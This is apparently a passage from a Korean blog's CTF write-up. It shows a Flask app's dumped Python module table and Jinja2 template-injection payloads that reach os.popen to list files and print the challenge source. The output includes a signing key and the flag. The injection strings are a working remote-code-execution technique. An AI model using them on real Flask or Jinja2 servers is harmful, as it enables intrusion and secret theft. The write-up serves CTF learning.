'ctypes.errno': None, 'encodings': <module 'encodings' from '/usr/local/lib/python2.7/encodings/__init__.pyc'>, 'flask.sys': None, 'flask.json.flask': None, 'rfc822': <module 'rfc822' from '/usr/local/lib/python2.7/rfc822.pyc'>, 'click.utils': <module 'click.utils' from '/usr/local/lib/python2.7/site-packages/click/utils.pyc'>, 're': <module 're' from '/usr/local/lib/python2.7/re.pyc'>, 'click.stat': None, 'email.quopri': None, 'math': <module 'math' from '/usr/local/lib/python2.7/lib-dynload/math.so'>, 'jinja2.compiler': <module 'jinja2.compiler' from '/usr/local/lib/python2.7/site-packages/jinja2/compiler.pyc'>, 'werkzeug.copy': None, 'ast': <module 'ast' from '/usr/local/lib/python2.7/ast.pyc'>, 'itsdangerous.json': None, 'ctypes.struct': None, 'werkzeug.collections': None, 'werkzeug.io': None, 'jinja2.copy': None, 'markupsafe.string': None, '_locale': <module '_locale' from '/usr/local/lib/python2.7/lib-dynload/_locale.so'>, 'logging': <module 'logging' from '/usr/local/lib/python2.7/logging/__init__.pyc'>, 'flask.traceback': None, 'traceback': <module 'traceback' from '/usr/local/lib/python2.7/traceback.pyc'>, 'werkzeug.test': <module 'werkzeug.test' from '/usr/local/lib/python2.7/site-packages/werkzeug/test.pyc'>, 'werkzeug.filesystem': <module 'werkzeug.filesystem' from '/usr/local/lib/python2.7/site-packages/werkzeug/filesystem.pyc'>, '_collections': <module '_collections' from '/usr/local/lib/python2.7/lib-dynload/_collections.so'>, 'werkzeug.mimetypes': None, 'werkzeug.cookielib': None, 'flask.jinja2': None, 'click.decorators': <module 'click.decorators' from '/usr/local/lib/python2.7/site-packages/click/decorators.pyc'>, 'array': <module 'array' from '/usr/local/lib/python2.7/lib-dynload/array.so'>, 'email.Errors': <email.LazyImporter object at 0x7f59d8f12c90>, 'ctypes.sys': None, '_LWPCookieJar': <module '_LWPCookieJar' from '/usr/local/lib/python2.7/_LWPCookieJar.pyc'>, 'posixpath': <module 'posixpath' from '/usr/local/lib/python2.7/posixpath.pyc'>, 'click.collections': None, 'itsdangerous.timed': <module 'itsdangerous.timed' from '/usr/local/lib/python2.7/site-packages/itsdangerous/timed.pyc'>, 'types': <module 'types' from '/usr/local/lib/python2.7/types.pyc'>, 'flask.hashlib': None, 'json._json': None, 'flask.ctx': <module 'flask.ctx' from '/usr/local/lib/python2.7/site-packages/flask/ctx.pyc'>, 'flask.pkgutil': None, '_codecs': <module '_codecs' (built-in)>, 'json.sys': None, 'copy': <module 'copy' from '/usr/local/lib/python2.7/copy.pyc'>, 'click.struct': None, 'hashlib': <module 'hashlib' from '/usr/local/lib/python2.7/hashlib.pyc'>, 'click.formatting': <module 'click.formatting' from '/usr/local/lib/python2.7/site-packages/click/formatting.pyc'>, 'itsdangerous.string': None, 'keyword': <module 'keyword' from '/usr/local/lib/python2.7/keyword.pyc'>, 'click.datetime': None, 'posix': <module 'posix' (built-in)>, 'jinja2.math': None, 'werkzeug.contrib.os': None, 'sre_compile': <module 'sre_compile' from '/usr/local/lib/python2.7/sre_compile.pyc'>, '_hashlib': <module '_hashlib' from '/usr/local/lib/python2.7/lib-dynload/_hashlib.so'>, 'flask_session.datetime': None, 'werkzeug.contrib.cPickle': None, 'logging.collections': None, 'email.base64': None, '__main__': <module '__main__' (built-in)>, 'jinja2.functools': None, 'click.contextlib': None, 'flask.datetime': None, 'encodings.codecs': None, 'email.MIMEMultipart': <email.LazyImporter object at 0x7f59d8f22050>, 'flask.functools': None, 'werkzeug.htmlentitydefs': None, 'jinja2.hashlib': None, 'warnings': <module 'warnings' from '/usr/local/lib/python2.7/warnings.pyc'>, 'encodings.ascii': <module 'encodings.ascii' from '/usr/local/lib/python2.7/encodings/ascii.pyc'>, 'click.threading': None, 'werkzeug.email': None, 'werkzeug.weakref': None, 'werkzeug.urllib2': None, 'flask.json.base64': None, 'jinja2.operator': None, '_io': <module '_io' from '/usr/local/lib/python2.7/lib-dynload/_io.so'>, 'linecache': <module 'linecache' from '/usr/local/lib/python2.7/linecache.pyc'>, 'click.itertools': None, 'flask.blueprints': <module 'flask.blueprints' from '/usr/local/lib/python2.7/site-packages/flask/blueprints.pyc'>, 'flask.helpers': <module 'flask.helpers' from '/usr/local/lib/python2.7/site-packages/flask/helpers.pyc'>, 'hmac': <module 'hmac' from '/usr/local/lib/python2.7/hmac.pyc'>, 'itsdangerous.struct': None, 'random': <module 'random' from '/usr/local/lib/python2.7/random.pyc'>, 'heapq': <module 'heapq' from '/usr/local/lib/python2.7/heapq.pyc'>, 'flask.templating': <module 'flask.templating' from '/usr/local/lib/python2.7/site-packages/flask/templating.pyc'>, 'datetime': <module 'datetime' from '/usr/local/lib/python2.7/lib-dynload/datetime.so'>, 'logging.os': None, 'ctypes._endian': <module 'ctypes._endian' from '/usr/local/lib/python2.7/ctypes/_endian.pyc'>, 'encodings.encodings': None, 'jinja2.marshal': None, 'jinja2.loaders': <module 'jinja2.loaders' from '/usr/local/lib/python2.7/site-packages/jinja2/loaders.pyc'>, 'email.time': None, '_json': <module '_json' from '/usr/local/lib/python2.7/lib-dynload/_json.so'>, 'itsdangerous.url_safe': <module 'itsdangerous.url_safe' from '/usr/local/lib/python2.7/site-packages/itsdangerous/url_safe.pyc'>, 'itsdangerous.hashlib': None, 'itsdangerous': <module 'itsdangerous' from '/usr/local/lib/python2.7/site-packages/itsdangerous/__init__.pyc'>, 'fort': <module 'fort' from './fort.pyc'>, 'werkzeug.utils': <module 'werkzeug.utils' from '/usr/local/lib/python2.7/site-packages/werkzeug/utils.pyc'>, 'werkzeug.uuid': None, 'click.termui': <module 'click.termui' from '/usr/local/lib/python2.7/site-packages/click/termui.pyc'>, 'click.io': None, 'flask_session.werkzeug': None, 'ssl': <module 'ssl' from '/usr/local/lib/python2.7/ssl.pyc'>, 'werkzeug.zlib': None, 'jinja2.ctypes': None, 'cookielib': <module 'cookielib' from '/usr/local/lib/python2.7/cookielib.pyc'>, 'jinja2.cStringIO': None, 'flask.operator': None, 'bisect': <module 'bisect' from '/usr/local/lib/python2.7/bisect.pyc'>, 'threading': <module 'threading' from '/usr/local/lib/python2.7/threading.pyc'>, 'flask.json.itsdangerous': None, 'email.Message': <email.LazyImporter object at 0x7f59d8f12dd0>, 'fcntl': <module 'fcntl' from '/usr/local/lib/python2.7/lib-dynload/fcntl.so'>, 'werkzeug.sys': None, 'flask_session.sessions': <module 'flask_session.sessions' from '/usr/local/lib/python2.7/site-packages/flask_session/sessions.pyc'>, 'locale': <module 'locale' from '/usr/local/lib/python2.7/locale.pyc'>, 'flask.cli': <module 'flask.cli' from '/usr/local/lib/python2.7/site-packages/flask/cli.pyc'>, 'jinja2.os': None, 'atexit': <module 'atexit' from '/usr/local/lib/python2.7/atexit.pyc'>, 'email.quopriMIME': <email.LazyImporter object at 0x7f59d8f12ed0>, 'werkzeug.cStringIO': None, 'flask_session.sys': None, 'calendar': <module 'calendar' from '/usr/local/lib/python2.7/calendar.pyc'>, 'jinja2.urllib': None, 'werkzeug._internal': <module 'werkzeug._internal' from '/usr/local/lib/python2.7/site-packages/werkzeug/_internal.pyc'>, 'flask.posixpath': None, 'urllib': <module 'urllib' from '/usr/local/lib/python2.7/urllib.pyc'>, 'flask.re': None, 'werkzeug.contrib.werkzeug': None, '_MozillaCookieJar': <module '_MozillaCookieJar' from '/usr/local/lib/python2.7/_MozillaCookieJar.pyc'>, 'ctypes.subprocess': None, 'email': <module 'email' from '/usr/local/lib/python2.7/email/__init__.pyc'>, 'werkzeug.socket': None, 'werkzeug.time': None, 'ctypes': <module 'ctypes' from '/usr/local/lib/python2.7/ctypes/__init__.pyc'>, 'werkzeug.pprint': None, 'click.core': <module 'click.core' from '/usr/local/lib/python2.7/site-packages/click/core.pyc'>, 'json.re': None, 'flask.socket': None, 'itertools': <module 'itertools' from '/usr/local/lib/python2.7/lib-dynload/itertools.so'>, 'opcode': <module 'opcode' from '/usr/local/lib/python2.7/opcode.pyc'>, 'email.calendar': None, 'platform': <module 'platform' from '/usr/local/lib/python2.7/platform.pyc'>, 'werkzeug.wsgi': <module 'werkzeug.wsgi' from '/usr/local/lib/python2.7/site-packages/werkzeug/wsgi.pyc'>, 'jinja2.random': None, 'encodings.unicode_escape': <module 'encodings.unicode_escape' from '/usr/local/lib/python2.7/encodings/unicode_escape.pyc'>, 'pkgutil': <module 'pkgutil' from '/usr/local/lib/python2.7/pkgutil.pyc'>, 'email.base64MIME': <email.LazyImporter object at 0x7f59d8f12e90>, 'flask.json.werkzeug': None, 'sre_constants': <module 'sre_constants' from '/usr/local/lib/python2.7/sre_constants.pyc'>, 'json': <module 'json' from '/usr/local/lib/python2.7/json/__init__.pyc'>, 'itsdangerous.itertools': None, 'flask.app': <module 'flask.app' from '/usr/local/lib/python2.7/site-packages/flask/app.pyc'>, 'email.utils': <module 'email.utils' from '/usr/local/lib/python2.7/email/utils.pyc'>, 'werkzeug.string': None, 'logging.atexit': None, 'jinja2.bccache': <module 'jinja2.bccache' from '/usr/local/lib/python2.7/site-packages/jinja2/bccache.pyc'>, 'werkzeug.contrib.time': None, 'email.socket': None, 'email.email': None, 'flask.click': None, 'zlib': <module 'zlib' from '/usr/local/lib/python2.7/lib-dynload/zlib.so'>, 'itsdangerous.zlib': None, 'email.random': None, 'json.decoder': <module 'json.decoder' from '/usr/local/lib/python2.7/json/decoder.pyc'>, 'werkzeug.StringIO': None, 'copy_reg': <module 'copy_reg' from '/usr/local/lib/python2.7/copy_reg.pyc'>, 'itsdangerous.datetime': None, 'site': <module 'site' from '/usr/local/lib/python2.7/site.pyc'>, 'flask.json.datetime': None, 'io': <module 'io' from '/usr/local/lib/python2.7/io.pyc'>, 'flask.itertools': None, 'werkzeug.werkzeug': None, 'markupsafe._speedups': <module 'markupsafe._speedups' from '/usr/local/lib/python2.7/site-packages/markupsafe/_speedups.so'>, 'flask.sessions': <module 'flask.sessions' from '/usr/local/lib/python2.7/site-packages/flask/sessions.pyc'>, 'werkzeug.functools': None, 'flask.os': None, 'json.json': None, 'email.re': None, 'sys': <module 'sys' (built-in)>, 'werkzeug.codecs': None, 'click.types': <module 'click.types' from '/usr/local/lib/python2.7/site-packages/click/types.pyc'>, 'itsdangerous.hmac': None, 'werkzeug.contrib': <module 'werkzeug.contrib' from '/usr/local/lib/python2.7/site-packages/werkzeug/contrib/__init__.pyc'>, 'jinja2.visitor': <module 'jinja2.visitor' from '/usr/local/lib/python2.7/site-packages/jinja2/visitor.pyc'>, 'flask.json': <module 'flask.json' from '/usr/local/lib/python2.7/site-packages/flask/json/__init__.pyc'>, '_weakref': <module '_weakref' (built-in)>, 'difflib': <module 'difflib' from '/usr/local/lib/python2.7/difflib.pyc'>, 'urlparse': <module 'urlparse' from '/usr/local/lib/python2.7/urlparse.pyc'>, 'werkzeug.local': <module 'werkzeug.local' from '/usr/local/lib/python2.7/site-packages/werkzeug/local.pyc'>, 'jinja2.optimizer': <module 'jinja2.optimizer' from '/usr/local/lib/python2.7/site-packages/jinja2/optimizer.pyc'>, 'werkzeug.warnings': None, 'markupsafe.sys': None, 'flask.wrappers': <module 'flask.wrappers' from '/usr/local/lib/python2.7/site-packages/flask/wrappers.pyc'>, 'werkzeug.inspect': None, 'select': <module 'select' from '/usr/local/lib/python2.7/lib-dynload/select.so'>, 'email.mime': <module 'email.mime' from '/usr/local/lib/python2.7/email/mime/__init__.pyc'>, 'struct': <module 'struct' from '/usr/local/lib/python2.7/struct.pyc'>, '_abcoll': <module '_abcoll' from '/usr/local/lib/python2.7/_abcoll.pyc'>, 'collections': <module 'collections' from '/usr/local/lib/python2.7/collections.pyc'>, 'flask_session.itsdangerous': None, 'email.Parser': <email.LazyImporter object at 0x7f59d8f12e10>, 'werkzeug.os': None, 'zipimport': <module 'zipimport' (built-in)>, 'jinja2.nodes': <module 'jinja2.nodes' from '/usr/local/lib/python2.7/site-packages/jinja2/nodes.pyc'>, 'textwrap': <module 'textwrap' from '/usr/local/lib/python2.7/textwrap.pyc'>, 'werkzeug.contrib.hashlib': None, 'jinja2.types': None, 'flask.signals': <module 'flask.signals' from '/usr/local/lib/python2.7/site-packages/flask/signals.pyc'>, 'signal': <module 'signal' (built-in)>, 'jinja2.keyword': None, 'quopri': <module 'quopri' from '/usr/local/lib/python2.7/quopri.pyc'>, 'jinja2._compat': <module 'jinja2._compat' from '/usr/local/lib/python2.7/site-packages/jinja2/_compat.pyc'>, 'stat': <module 'stat' from '/usr/local/lib/python2.7/stat.pyc'>, '_ssl': <module '_ssl' from '/usr/local/lib/python2.7/lib-dynload/_ssl.so'>, 'click.weakref': None, 'email.Generator': <email.LazyImporter object at 0x7f59d8f12d10>, 'logging.traceback': None, 'email.MIMEAudio': <email.LazyImporter object at 0x7f59d8f12f10>, 'flask.errno': None, 'jinja2.stat': None, 'werkzeug': <module 'werkzeug' from '/usr/local/lib/python2.7/site-packages/werkzeug/__init__.pyc'>, 'werkzeug.posixpath': None, 'flask.warnings': None, 'jinja2.ext': <module 'jinja2.ext' from '/usr/local/lib/python2.7/site-packages/jinja2/ext.pyc'>, 'UserDict': <module 'UserDict' from '/usr/local/lib/python2.7/UserDict.pyc'>, 'inspect': <module 'inspect' from '/usr/local/lib/python2.7/inspect.pyc'>, 'jinja2.filters': <module 'jinja2.filters' from '/usr/local/lib/python2.7/site-packages/jinja2/filters.pyc'>, 'jinja2.fnmatch': None, 'werkzeug.exceptions': <module 'werkzeug.exceptions' from '/usr/local/lib/python2.7/site-packages/werkzeug/exceptions.pyc'>, 'werkzeug.tempfile': None, '_functools': <module '_functools' from '/usr/local/lib/python2.7/lib-dynload/_functools.so'>, 'email.Iterators': <email.LazyImporter object at 0x7f59d8f12d90>, 'socket': <module 'socket' from '/usr/local/lib/python2.7/socket.pyc'>, 'itsdangerous.jws': <module 'itsdangerous.jws' from '/usr/local/lib/python2.7/site-packages/itsdangerous/jws.pyc'>, 'email.Charset': <email.LazyImporter object at 0x7f59d8f12c10>, 'jinja2.warnings': None, 'werkzeug.urls': <module 'werkzeug.urls' from '/usr/local/lib/python2.7/site-packages/werkzeug/urls.pyc'>, 'os': <module 'os' from '/usr/local/lib/python2.7/os.pyc'>, 'marshal': <module 'marshal' (built-in)>, 'werkzeug.contrib.errno': None, '__future__': <module '__future__' from '/usr/local/lib/python2.7/__future__.pyc'>, 'flask.cStringIO': None, 'binascii': <module 'binascii' from '/usr/local/lib/python2.7/lib-dynload/binascii.so'>, 'werkzeug.datetime': None, '__builtin__': <module '__builtin__' (built-in)>, 'jinja2.itertools': None, 'operator': <module 'operator' from '/usr/local/lib/python2.7/lib-dynload/operator.so'>, 'werkzeug.httplib': None, 'jinja2.runtime': <module 'jinja2.runtime' from '/usr/local/lib/python2.7/site-packages/jinja2/runtime.pyc'>, 'itsdangerous.serializer': <module 'itsdangerous.serializer' from '/usr/local/lib/python2.7/site-packages/itsdangerous/serializer.pyc'>, 'json.struct': None, 'itsdangerous.encoding': <module 'itsdangerous.encoding' from '/usr/local/lib/python2.7/site-packages/itsdangerous/encoding.pyc'>, 'errno': <module 'errno' (built-in)>, '_socket': <module '_socket' from '/usr/local/lib/python2.7/lib-dynload/_socket.so'>, 'email.Utils': <email.LazyImporter object at 0x7f59d8f12e50>, 'encodings.latin_1': <module 'encodings.latin_1' from '/usr/local/lib/python2.7/encodings/latin_1.pyc'>, 'werkzeug.contrib.platform': None, '_warnings': <module '_warnings' (built-in)>, 'encodings.__builtin__': None, 'jinja2.idtracking': <module 'jinja2.idtracking' from '/usr/local/lib/python2.7/site-packages/jinja2/idtracking.pyc'>, 'email.os': None, 'flask.config': <module 'flask.config' from '/usr/local/lib/python2.7/site-packages/flask/config.pyc'>, 'itsdangerous._compat': <module 'itsdangerous._compat' from '/usr/local/lib/python2.7/site-packages/itsdangerous/_compat.pyc'>, '_sysconfigdata': <module '_sysconfigdata' from '/usr/local/lib/python2.7/_sysconfigdata.pyc'>, '_struct': <module '_struct' from '/usr/local/lib/python2.7/lib-dynload/_struct.so'>, 'click.functools': None, 'logging.time': None, 'jinja2.environment': <module 'jinja2.environment' from '/usr/local/lib/python2.7/site-packages/jinja2/environment.pyc'>, 'logging.warnings': None, 'werkzeug.random': None, 'mimetools': <module 'mimetools' from '/usr/local/lib/python2.7/mimetools.pyc'>, 'jinja2.re': None, 'logging.codecs': None, '_random': <module '_random' from '/usr/local/lib/python2.7/lib-dynload/_random.so'>, 'markupsafe._compat': <module 'markupsafe._compat' from '/usr/local/lib/python2.7/site-packages/markupsafe/_compat.pyc'>, 'jinja2.decimal': None, 'flask.werkzeug': None, 'itsdangerous.base64': None, 'contextlib': <module 'contextlib' from '/usr/local/lib/python2.7/contextlib.pyc'>, 'werkzeug.contrib.tempfile': None, 'flask.itsdangerous': None, 'flask.__future__': None, 'click.re': None, 'email.warnings': None, 'flask.types': None, 'markupsafe.collections': None, 'genericpath': <module 'genericpath' from '/usr/local/lib/python2.7/genericpath.pyc'>, 'mimetypes': <module 'mimetypes' from '/usr/local/lib/python2.7/mimetypes.pyc'>, 'werkzeug.itertools': None, 'itsdangerous.time': None, 'urllib2': <module 'urllib2' from '/usr/local/lib/python2.7/urllib2.pyc'>, 'email.Encoders': <email.LazyImporter object at 0x7f59d8f12c50>, 'ctypes.ctypes': None, 'itsdangerous.decimal': None, 'werkzeug.__builtin__': None, 'click._compat': <module 'click._compat' from '/usr/local/lib/python2.7/site-packages/click/_compat.pyc'>, 'time': <module 'time' from '/usr/local/lib/python2.7/lib-dynload/time.so'>, 'flask.threading': None} []['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['sys']['modules']['os'] <module 'os' from '/usr/local/lib/python2.7/os.pyc'> []['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['sys']['modules']['os']['popen']('ls')['read']() e7f4cf27-0421-493d-88b1-70855f5fa28f e7f4cf27-0421-493d-88b1-70855f5fa28f?a=e7f4cf27-0421-493d-88b1-70855f5fa28f%0Aflask_session%0Afort.py%0Afort.pyc%0Amain.py%0Amain.pyc%0Aprestart.sh%0Astatic%0Atemplates%0Auwsgi.ini flask_session fort.py fort.pyc main.py main.pyc prestart.sh static templates uwsgi.ini []['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['sys']['modules']['os']['popen']('cat fort\x2epy')['read']() from flask import Flask, session SECKEY = "some random key for signing 70657529378630738104827452603621" FLAG = "ASIS{Kn0cK_knoCk_Wh0_i5_7h3re?_4nee_Ane3,VVh0?_aNee0neYouL1k3!}" CORRECT_BEHAVIOUR = list(map(int, "34515465413625214253")) PERFECT_CREDIT = sum([ x for x in range(len(CORRECT_BEHAVIOUR)) ]) def history(): return session.get("history", []) def visit(door): session["history"] = history() + [door] if len(session["history"]) > len(CORRECT_BEHAVIOUR): session["history"] = session["history"][-len(CORRECT_BEHAVIOUR):] def credit(): credit = 0 hst = history() for i in range(len(hst)): for j in range(len(hst) - i): if hst[i + j] == CORRECT_BEHAVIOUR[j]: credit += j else: break return credit def trustworthy(): return credit() == PERFECT_CREDIT
'CTF Writups' 카테고리의 다른 글
TG:Hack 2019 - Wizardschat 풀이 (0) | 2019.04.20 |
---|---|
Hack Zone Tunisia - Some Chemistry 풀이 (0) | 2019.04.14 |
ByteBandits CTF - Online Previewer 2 문제풀이 (0) | 2019.04.14 |
ByteBandits CTF - Online Previewer 1 문제풀이 (0) | 2019.04.14 |
ByteBandits CTF - EasyPHP 문제풀이 (0) | 2019.04.14 |
Comments